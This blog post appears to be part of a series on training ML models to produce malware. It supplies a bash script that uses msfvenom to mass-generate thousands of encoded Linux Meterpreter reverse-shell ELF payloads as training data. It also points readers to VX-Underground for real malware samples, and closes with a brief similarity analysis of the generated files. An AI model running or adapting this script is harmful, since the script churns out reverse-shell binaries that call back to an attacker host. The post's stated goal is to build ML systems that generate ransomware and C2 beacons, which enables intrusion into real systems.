Malicious ML series - generate ELF training data


I hold a PhD in Computer Science and have been published in a variety of international peer-reviewed journals.

AI is going to be a problem. I don't know what will cause the first "big issue". It might come from a courtroom where a defendant is sent to jail based on erroneous AI-generated data, or it could be a death in a medical setting. But something is going to happen.

Let's take the existing adversarial AI research (there's been plenty) and make it useful.

I'm here to bring you up to speed.

Purpose

If we want to train an ML algorithm to produce something malicious (say, a C2 beacon or a ransomware binary), we need good training data.

Approach

Use msfvenom to generate several thousand samples (the script below defaults to 10,000) that we can then feed into an ML algorithm.

Drawbacks

Because a model trained on raw binaries bypasses the compile and link steps, at best it will generate working binaries for a single architecture. Even if it generates a valid binary, it's not going to produce magical AV/EDR-evading binaries that are compatible with multiple platforms and have customizable C2 domains. However, it's still a fun experiment.
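A cheap first check on "valid binary" and "single architecture" is to look at the ELF header. The sketch below is my own illustration, not part of the pipeline: elf_class is a hypothetical helper name, and it assumes od, tr and sed are available. It only reads the magic bytes and the class byte, so passing it says nothing about whether a file would actually load or run.

```shell
# elf_class FILE: hypothetical helper; prints "elf32", "elf64", or "not-elf".
# Only the first five bytes are inspected: the 4-byte ELF magic and EI_CLASS.
elf_class() {
    local header
    # Dump the first 5 bytes as hex pairs, e.g. "7f 45 4c 46 01"
    header=$(od -An -tx1 -N5 "$1" 2>/dev/null | tr -s ' \n' ' ' | sed 's/^ //; s/ $//')
    case "$header" in
        "7f 45 4c 46 01") echo "elf32" ;;
        "7f 45 4c 46 02") echo "elf64" ;;
        *)                echo "not-elf" ;;
    esac
}
```

Something like elf_class model_output.bin (a placeholder filename) is enough to throw away obvious garbage before trying anything more expensive.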

Alternatives to generation

There are lots of malicious binary examples out there.

VX-Underground

Download binaries directly from VX-Underground or a standard academic dataset. Compared with generated samples, this introduces a lot more variety across the PE and ELF formats.

Code

Prereq - msfvenom and uuidgen installed

#!/bin/bash

numFiles=10000
mkdir -p out   # make sure the output directory exists

# Candidate values, defined once outside the loop.
# Duplicate payload entries make those payloads more likely to be picked.
LPORTCHOICES=(80 443 1025 8080 8888 4444 1234 12345 5555 3333 4433 8443 9999 10000)
PAYLOADTYPES=("linux/x86/meterpreter/reverse_tcp" "linux/x86/meterpreter_reverse_tcp" "linux/x86/meterpreter/reverse_tcp_uuid" "linux/x86/meterpreter_reverse_https" "linux/x86/meterpreter_reverse_tcp" "linux/x86/meterpreter_reverse_http" "linux/x86/meterpreter_reverse_https")
ENCODERS=("x86/shikata_ga_nai" "x86/xor_dynamic" "generic/none")

overall_start_time=$(date +%s)
echo "Generating files.."
for i in $(seq 1 "$numFiles"); do

    # Pick a random host octet (1-100), port, payload and encoder
    LHOSTO=$((1 + RANDOM % 100))
    LPORTR=${LPORTCHOICES[RANDOM % ${#LPORTCHOICES[@]}]}
    PAYLOAD=${PAYLOADTYPES[RANDOM % ${#PAYLOADTYPES[@]}]}
    ENCODERR=${ENCODERS[RANDOM % ${#ENCODERS[@]}]}
    FILENAME=$(uuidgen).elf

    # Generate the sample; msfvenom errors are discarded
    msfvenom -p "$PAYLOAD" LHOST="192.168.0.$LHOSTO" LPORT="$LPORTR" -e "$ENCODERR" -f elf -o "out/$FILENAME" 2> /dev/null

    # Only record a label if a non-empty file was actually written
    if [ -s "out/$FILENAME" ]; then
        printf '%s\t%s\t%s\t%s\t%s\n' "$FILENAME" "$PAYLOAD" "192.168.0.$LHOSTO" "$LPORTR" "$ENCODERR" >> labels.tsv
    fi

    # Progress bar is 50 characters wide, so scale the fill to 0-50
    percent=$((i * 100 / numFiles))
    filled=$((i * 50 / numFiles))
    bar=$(printf '%*s' "$filled" '' | tr ' ' '#')
    printf '\rProgress: [%-50s] %d%%' "$bar" "$percent"

done
echo
overall_end_time=$(date +%s)
duration=$((overall_end_time - overall_start_time))
echo "Done in $duration seconds."
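Since msfvenom's error output is thrown away, a failed generation is easy to miss, so it's worth sanity-checking labels.tsv against the out/ directory before training on it. This is a minimal sketch: count_by_column and missing_samples are hypothetical helper names I made up, and the column numbers assume the five-column layout the script writes (filename, payload, LHOST, LPORT, encoder).

```shell
# count_by_column FILE COL: hypothetical helper; counts rows per distinct value
# in tab-separated column COL (2 = payload, 5 = encoder in labels.tsv).
count_by_column() {
    local tab
    tab=$(printf '\t')
    awk -F'\t' -v col="$2" '
        { n[$col]++ }
        END { for (k in n) printf "%d\t%s\n", n[k], k }' "$1" |
        sort -t "$tab" -k1,1nr -k2,2
}

# missing_samples FILE DIR: hypothetical helper; prints every labeled filename
# that is absent or empty in DIR.
missing_samples() {
    local tab name _rest
    tab=$(printf '\t')
    while IFS="$tab" read -r name _rest; do
        [ -s "$2/$name" ] || echo "$name"
    done < "$1"
}
```

Running count_by_column labels.tsv 2 shows how evenly the payload types came out, and missing_samples labels.tsv out should print nothing if every label has a file behind it.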

Explanation

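The script generates a batch of Meterpreter payloads for use in ML algos. Each sample gets a randomly chosen payload type, LHOST, LPORT and encoder, and those choices are recorded in labels.tsv.

Since the differences between these files will simply be the encoded (or encrypted) payload, which will be high-entropy, it's doubtful any ML algorithm can learn enough to generate working binaries, much less working malware.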
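To put a number on "high-entropy", you can compute the Shannon entropy of each file's bytes, H = -sum(p_b * log2(p_b)), where p_b is the fraction of bytes with value b. The sketch below is one way to do that with od and awk. byte_entropy is a hypothetical helper name, and this measures the whole file rather than just the payload region, so the fixed ELF header pulls the figure down a little.

```shell
# byte_entropy FILE: hypothetical helper; prints Shannon entropy in bits per byte
# (0 = one repeated byte value, 8 = all 256 byte values equally likely).
byte_entropy() {
    # -v stops od from collapsing repeated lines, which would skew the counts
    od -An -v -tu1 "$1" | awk '
        { for (i = 1; i <= NF; i++) { count[$i]++; total++ } }
        END {
            if (total == 0) { print "0.0000"; exit }
            h = 0
            for (b in count) {
                p = count[b] / total
                h -= p * log(p) / log(2)
            }
            printf "%.4f\n", h
        }'
}
```

Looping it over out/*.elf and comparing the values per encoder in labels.tsv would show whether the encoded samples really sit closer to 8 bits per byte than the generic/none ones.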

Entropy Analysis

Similarity of generated ELF binaries

We ran a simple cosine similarity comparison across the generated binaries. As the animation shows, the differences between binaries are distributed fairly randomly; note, however, that the scale of the differences is not extreme.
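For anyone who wants to reproduce something similar, here is a rough sketch of a pairwise comparison. It assumes each file is represented as a 256-bin byte-frequency histogram, which is my assumption for illustration and not necessarily the representation behind the animation. byte_cosine is a hypothetical helper name.

```shell
# byte_cosine FILE_A FILE_B: hypothetical helper; prints the cosine similarity
# of the two files' byte-frequency histograms (1 = identical distribution,
# 0 = no byte values in common).
byte_cosine() {
    {
        # Tag each line of byte values with the file it came from
        od -An -v -tu1 "$1" | sed 's/^/A /'
        od -An -v -tu1 "$2" | sed 's/^/B /'
    } | awk '
        { for (i = 2; i <= NF; i++) hist[$1, $i]++ }
        END {
            for (b = 0; b < 256; b++) {
                x = hist["A", b]; y = hist["B", b]
                dot += x * y; na += x * x; nb += y * y
            }
            if (na == 0 || nb == 0) { print "0.0000"; exit }
            printf "%.4f\n", dot / (sqrt(na) * sqrt(nb))
        }'
}
```

A histogram throws away byte order, so two files with the same bytes shuffled score 1. That makes it a coarse measure, but it is cheap enough to run across a few thousand pairs.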

Still, it's a fun experiment.
